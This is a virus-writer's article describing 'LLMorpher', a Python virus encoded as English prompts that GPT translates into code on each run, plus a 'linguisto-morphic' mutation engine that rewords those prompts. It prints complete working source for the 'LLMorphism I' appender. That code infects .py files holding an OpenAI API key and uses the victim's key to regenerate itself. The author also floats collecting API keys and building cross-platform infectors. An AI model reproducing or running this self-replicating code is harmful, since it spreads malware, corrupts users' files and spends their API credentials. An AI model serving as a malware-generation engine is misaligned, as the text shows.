LLMorpher.txt

            ************************************************************
                  Using GPT to encode and mutate computer viruses
                           entirely in natural language
                             
                                         by Second Part To Hell
            ************************************************************


        The ideas and behaviour of a computer virus are conventionally
        stored as executable code written in a computer language.
        
        Here we go beyond and show how to encode a self-replicating
        code entirely in the natural language. Rather than concrete
        code instructions, our virus consists of a list of well-
        defined sentences are written in English. We then use OpenAI's
        GPT, one of the most powerful artificial intelligence systems
        publically available. GPT can create different codes with the
        same behaviour, which is a new form of metamorphism.
        
        Finally, we use GPT to exploit the ambiguity of natural
        language. GPT reformulates the English prompts which define
        the virus code itself. The new prompts carry the same idea but
        are formulated in different ways. We call this new type of
        mutation "Linguisto-Morphism". 
        
        The two example viruses LLMorphism I and II are the first
        examples of a new species which exploits the vanishing boundary
        between natural and computer language. 
        
         

    1) Introduction

    2) Encoding self-replicating code in language
    2.1) The OpenAI GPT API
    2.2) The virus in a language

    3) Mutation of language: Linguisto-Morphic computer viruses

    4) What comes next?

          
                -  -  -  -  -  -  -  -  -





1) Introduction

With the emergence and public availability of extremely powerful artificial 
intelligence systems, specifically large language models such as GPT, the 
boundary between natural and computer language vanish. These systems can take 
natural language such as English or german, and use the instructions to create 
computer code in languages such as python, C++ or JavaScript. Likewise, they 
can explain, in natural language.

In this article, I show how this technology is now powerful enough to fully 
encode a computer virus. The self-replicating code is not encoded as a set of 
instructions in a computer language, but rather as instructions in English. We 
then use GPT to translate the natural language description into executable 
code.

As natural language is ambiguous, the computer code generated by GPT can vary 
from execution to execution. In this way, using GPT is potentially the easiest 
way to generate powerful metamorphic computer viruses. Furthermore, GPT can 
not only produce different codes but can also reformulate the English 
language. In our case, it reformulates the very prompts which define the codes 
of the virus. In this way, it goes beyond the idea of metamorphic codes
(computer codes which change the structure of the code) but goes towards a new 
type of mutation which works at the linguistic level, thus we call it a
"linguisto-morphic" virus.

Our codes are the first early example of a possible future class of computer 
viruses that exploit the power of the most powerful artificial intelligence 
systems known to humanity. These systems are only being employed over the last 
few months and are clearly revolutionizing society. Clearly what I show here 
is only the first glimpse of what might be possible.






2) Encoding self-replicating code in language

2.1) The OpenAI GPT API

GPT (Generative Pre-trained Transformer) is a family of large language models 
(LLM) trained on enormous data from the internet, published by OpenAI. 
Basically, during its training, it has seen a good fraction of the digitalized 
information of humanity. The underlying technology, a transformer with an 
attention mechanism, was invented by Google Brain in 2017. OpenAI has since 
developed ever-growing systems:


 - GPT1: June 2018
 - GPT2: Feb 2019
 - GPT3: May 2020
 - GPT3.5: March 2022
 - ChatGPT (GPT3.5 fine-tuned for conversations): November 2022 

These models are available via the openai python library. Here is a simple 
example, in which we use the "text-davinci-003" engine, which is the most 
powerful generic text completion model GPT3.5.

More infos here: https://platform.openai.com/docs/models/gpt-3-5

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
import openai
openai.api_key = "..."
def return_text(prompt, openai_key=openai.api_key):
    response = openai.Completion.create(
        engine="text-davinci-003",
        max_tokens=1000,
        temperature=0.5,
        prompt=prompt,
        api_key=openai_key
    )
    return response['choices'][0]['text']
    
print(return_text("What is a beautiful fact about space discovered by the 
Hubble space telescope?"))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Response: 
********************************************************************
One of the most beautiful facts discovered by the Hubble Space Telescope is 
that there are roughly 125 billion galaxies in the observable universe. This 
means that for every grain of sand on Earth, there are at least 1,000 galaxies 
in the universe.
********************************************************************

Cool, that's quite impressive. -- But GPT can also code, for instance, it is 
fluent in Python:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
return_text("Write a python code which prints the first 10 even numbers.")
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Response: 
********************************************************************
for num in range(2,21,2):
    print(num)
********************************************************************

Wonderful. Now let's think: Computer viruses are pieces of code. GPT can 
automatically translate language to code. We can automatically query GPT. 
Therefore, we can use GPT to encode a computer virus in natural language. 
That's what we are doing next.




2.2) The virus in a language

The simplest computer virus in python could look like this: It appends its own 
code to every .py file in the current directory. Obviously, this description 
can be expanded, for instance by searching for all python files on the hard 
disk, sending its own code via email or slack, etcetc. - But for this proof-
of-principle showcase, our description is sufficient.

Writing its own code to the end of every .py file is simple:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
import os

for file in os.listdir():
    if file.endswith(".py"):
        with open(filename, 'a') as f:
            f.write('\n' + own_code)
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

The question is, how do we get 'own_code'. We could either open the current 
file ("os.path.basename(__file__)"), and extract our code, or we can store our 
code in a variable, which we execute. The great thing in this case is: When we 
execute the python code inside the variable, we have access to the variable 
itself, i.e. to our code:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
own_code="some_var='666'\nprint('own_code: '+own_code+some_var)"
exec(own_code)
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Output: 
********************************************************************
own_code="some_var=666\nprint('I am inside of the variable own_code, and the variable content is: '+own_code)"
exec(own_code)
********************************************************************

In the next step, let's try to store some strings which we pass to GPT, and 
which should return a part of the virus code. For example, let's ask for a 
function which returns all .py files in the current directory:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import openai
openai.api_key = "..."

def return_text(prompt, openai_key=openai.api_key):
    response = openai.Completion.create(
        engine="text-davinci-003",
        max_tokens=1000,
        temperature=0.5,
        prompt=prompt,
        api_key=openai_key
    )
    return response['choices'][0]['text']
    
python_in_english="Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it."
print(return_text(python_in_english))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
import os

def get_files():
    file_list = []
    for root, dirs, files in os.walk('.'):
        for file in files:
            if file.endswith('.py'):
                file_list.append(file)
    return file_list
********************************************************************

Perfect!

We can move further and do this for every single function that we need. We 
already have the get_files function. Furthermore, we need a write_to_file 
function which writes 'own_code' to the file. We need to consider two more 
details:

A) To run the openai API, we need an API key. We could either carry it in the 
code (which is the easiest target to be blocked), or we can only infect files 
which already have an API key. Here I chose the second option. Alternatively 
and more fancy, one can collect API keys while we walk through cyberspace, and 
store them inside the virus code.

B) We don't want to infect the same file twice.

One way to solve both challenges is by infecting files only if they contain 
the string "openai.api_key" exactly once. If they contain it once, we can 
assume that they define a valid key. This is how many openai documentation 
example scripts look. If we infect a file, we also carry the string at least 
one more time, therefore all infected files carry this string more than once. 
Perfect.

In some cases, GPT generates the correct code but defines the variables of the 
code to demonstrate the example. For that reason, we have to play with prompt 
engineering and force GPT to not write anything else, especially not overwrite 
variables.

In that case, our code looks like this:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import openai
openai.api_key = "..."

prompts_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True,  if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable own_code as the second argument. (own_code is a variable which is defined above)")

def return_text(prompt, openai_key=openai.api_key):
    response = openai.Completion.create(
        engine="text-davinci-003",
        max_tokens=1000,
        temperature=0.5,
        prompt=prompt,
        api_key=openai_key
    )
    return response['choices'][0]['text']


def comp_str_fct(list_str):
    combined_str = ""
    for str in list_str:
        combined_str += return_text(str) + "\n"
    return combined_str

print(comp_str_fct(prompts_list))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Response: 
********************************************************************
import os

def get_files():
    file_list = []
    for file in os.listdir():
        if file.endswith(".py"):
            file_list.append(file)
    return file_list

file_list = get_files()
print(file_list)


def get_content(text_file):
    with open(text_file) as file:
        return file.read()


def is_key(string):
  return string.count('openai.api_key') == 1


def write_to_file(filename, string):
    with open(filename, 'a') as f:
        f.write(string + '\n')


for curr_element in get_files():
    if is_key(get_content(curr_element)):
        write_to_file(curr_element, own_code)
********************************************************************

Wow, that was easy. The only thing missing now is to generate the variable 
'own_code'. What do we need? 

    (A) The prompts which generate the virus code (see above)
    (B) The python code which translates the prompts to python code (including 
        the OpenAI API calls) and executes it.
    (C) The prompts that generate the python code which translates the prompts 
        to python code (including the OpenAI API calls)  and executes it.
    
    
A and B we basically already have, the last piece looks confusing but is as 
simple as the rest. For example, we need the function which generates a python 
function that calls the OpenAI API. Nothing easier than that:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
python_code=return_text("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.5, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
print(python_code)
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
def return_text(prompt, openai_key = openai.api_key):
    return openai.Completion.create(engine = 'davinci-003', 
                                    max_tokens = 1000, 
                                    temperature = 0.5, 
                                    prompt = prompt, 
                                    api_key = openai_key)
********************************************************************

You can see that the code of return_text is different from the one I wrote 
above. This is due to GPT's intrinsic variability defined among others by the 
temperature. The outputs can be different at the code level but are the same 
at the behaviour level (at least in most cases, when all works well).

The plan is now to make another list of prompts (let's call them tofile_list), 
which contain describe the code of (B) [and therefore, is part (C) of the code 
above]

One crucial part is to add all prompts to the own code:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt="Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that own_code is already defined). For each element, do the following three steps: 1) Add to the string own_code the string 'prompts_list.append('. 2) Add to the string own_code the current element of the loop with double quotation marks. 3) Add to the string own_code the string ')' and a line break."

print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
for element in prompts_list:
    own_code += 'prompts_list.append("' + element + '")\n'
********************************************************************

Another crucial part is the execution of the viral code:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt="Write a python code (only this one line) which takes a multi line 
python code called complete_str, and runs it."

print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Response: 
********************************************************************
exec(complete_str)
********************************************************************

Fantastic. Now we have basically all ingredients -- here is the full code for 
the appender. I call it "LLMorphism I":

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import openai
openai.api_key = "..."

prompts_list=[]
tofile_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True,  if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable tofile_str as the second argument. (tofile_str is a variable which is defined above)")
prompts_list.append("Write a python code (only this one line) which prints: 'LLMorphism I by SPTH - a new-age AI-based self-replicator, powered by OpenAIs GPT. Fully encodes the self-replicator into natural language.'.")
prompts_list.append("Write a python code (only this one line) which prints: 'Hugs to the valhalla gang - hh86, roy g biv, JPanic, herm1t!'.")
tofile_list.append("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.5, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
tofile_list.append("Write the following python function comp_str_fct, which has one argument. The argument is a list of strings. For each element of the list, call the function return_text (with the current element as the argument), and take its return value (a string). The function should combine all strings (with a line break) and return it.")
tofile_list.append("Write one line in python, which defines a string with the name tofile_str. The value of the string is 'prompts_list=[]', with a line break before and afterwards.")
tofile_list.append("Write one line in python, which appends and store to the string with the name tofile_str. The appended value is 'tofile_list=[]', followed by a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'prompts_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called tofile_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'tofile_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a python code (only this one line) which defines a variable vic_code. The variable is generated by a function call of comp_str_fct with the argument being the variable called tofile_list.")
tofile_list.append("Write a python code, which appends to the string variable tofile_str a line break, and then the variable vic_code (these are two variable names, not strings themselves!). Store the result in the variable tofile_str.")
tofile_list.append("Write a python code (only this one line) which defines a variable complete_str. The variable is generated by a function call of comp_str_fct with the argument being the variable called  prompts_list.")
tofile_list.append("Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it.")


def return_text(prompt, openai_key=openai.api_key):
    response = openai.Completion.create(
        engine="text-davinci-003",
        max_tokens=1000,
        temperature=0.5,
        prompt=prompt,
        api_key=openai_key
    )
    return response['choices'][0]['text']

def comp_str_fct(list_str):
    combined_str = ""
    for str in list_str:
        combined_str += return_text(str) + "\n"
    return combined_str

tofile_str = '\nprompts_list=[]\n'
tofile_str += 'tofile_list=[]\n'

for element in prompts_list:
    tofile_str += 'prompts_list.append("' + element + '")\n'

for element in tofile_list:
    tofile_str += 'tofile_list.append("' + element + '")\n'

vic_code = comp_str_fct(tofile_list)
tofile_str += '\n' + vic_code
complete_str = comp_str_fct(prompts_list)
exec(complete_str)

  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  
  :)
  
  
  
  
  
  
  
3) Mutation of language: Linguisto-Morphic computer viruses

GPT is amazing to deal with language and code. One feature is its capability 
to reformulate text. You can use it to improve the style of a text. For 
example:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt="Please improve the style of the following sentences and make them more engaging: The solar system has eight or nine planets, if you count or not Pluto, but Pluto is cool because it was visited by New Horizon that sent nice pix."
print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
The Solar System is home to a whopping 8 or 9 planets, depending on whether you count Pluto or not - and let's be honest, who doesn't want to count Pluto? After all, it was visited by New Horizon which sent back some stunning images!
********************************************************************

YES, amazing style, love it. Now -- all of our prompts are written in natural 
language too. We could ask GPT to modify the prompts too. Let's try that:


 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt='Please change the style of the language of the following sentence without changing its content: "Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it."'
print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
Construct a Python code (just this one line) that will execute a multi-line Python code referred to as complete_str.
********************************************************************

If we run this, the output is indeed again the correct code:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt='Construct a Python code (just this one line) that will execute a multi-line Python code referred to as complete_str.'
print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
exec(complete_str)
********************************************************************

OK - cool! Now we just need to make a loop over all prompts and replace them 
with a new prompt with a certain percentage. This is what I have demonstrated 
in 'LLMorphism II'.

This mutation engine is extremely cool, it is highly impressive that GPT can 
do so. However, it is also quite brittle, often the reformulation changes my 
carefully constructed prompts and therefore the next generation produces code 
that behaves slightly differently. For that reason, my prompt to change the 
code is more subtle:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
modifyer_prompt='Slightly reformulate in natural langauge the next sentence, without changing its meaning,  do not interpret the content, keep the length and structure of the string as similar as possible, very importantly do not change the content at all,  and only make slight modifications: '+virus_prompt
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

This works in many cases, however, sometimes it still produces invalid output. 
I believe that this will be solved naturally with more powerful GPTs in the 
near future, therefore it is for now not worth spending even more effort into 
prompt engineering.

Instead, for now, when calling GPT, we can use a very low temperature. The 
temperature controls the level of randomness in the output, and low 
temperature produces usually high-quality responses. Another trick that I 
found that works well is to split the logic of the code into many different 
prompts and let GPT only construct minimal functions. This is not too 
surprising, simpler functions need simpler descriptions which are less 
ambiguous.

Another exciting possibility is the capability of translating between 
different languages:

 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt='Translate the following sentence between german and english (only one langauge, dont change the content): "Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it."'
print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 
Response: 
********************************************************************
German: Schreibe einen Python-Code (nur diese eine Zeile), der einen mehrzeiligen Python-Code namens complete_str aufnimmt und ausführt.
********************************************************************

And we can still execute it and get the correct code back:
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
prompt='German: Schreibe einen Python-Code (nur diese eine Zeile), der einen mehrzeiligen Python-Code namens complete_str aufnimmt und ausführt.'
print(return_text(prompt))
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Response: 
********************************************************************
exec(complete_str)
********************************************************************

Amazing.

For more complex strings, the quality of the translation suffers, and often 
lead to wrong code one generation later. Therefore, for now I didn't include 
this mutation engine into LLMorpher, however the code would look exactly the 
same as for the reformulation task. And i bet, one generation of GPT down the 
line, this problem is solved automatically.





4) What comes next?

The emergence of powerful large language models, which are accessible via APIs 
already enables applications we didn't anticipate just a few years ago. The 
mere fact that it leads us to questions such as self-awareness and 
consciousness (see discussion of google's LaMDA or Chalmer's plenary talk at 
NeurIPS) is an intellectual revolution that we might not have seen before in 
our lifetime.

The ability to flawlessly translate between natural and computer languages 
will enable the abstraction of the code entities of pure ideas. What is the 
code of the computer virus? Is it the characters written in a python file? Not 
anymore, the computer virus is an idea described in a messy, highly ambiguous, 
natural language. 

In the current state, I had to split up the code of the virus into many micro-
ideas such that GPT does not confuse what I mean (or maybe, such that I can 
describe it in the most unambiguous way possible). Of course, in the future, 
we will be able to describe much more complex ideas directly, which could lead 
to macro-logic mutators. This is already shown by Codex and Copilot. We 
envision massive cross-platform infectors as GPTs can translate from one 
language into another language. 

Clearly, computer viruses written as ideas in natural language, together with 
the ability to reformulate the natural language without changing the idea 
could lead to exciting and spooky companions in our future.



                                             Second Part To Hell
                                             March 2023
                                                                      
                                             https://github.com/SPTHvx/SPTH
                                             sperl.thomas@gmail.com
                                             twitter: @SPTHvx          



PS: My greetz go out to the valhalla gang. First and formost, hh86, whereever 
you are. roy g biv & JPanic -- see you in Valholl, the hall of the slain! And 
herm1t, I wish you all the best!!!

Best regards to the great security researchers Peter Ferrie, Eric Filiol, Mark 
Stamp, Mikko Hypponen.

Thanks to the OpenAI team for pushing this research. Clearly you revolutionize 
the world and make the future exciting!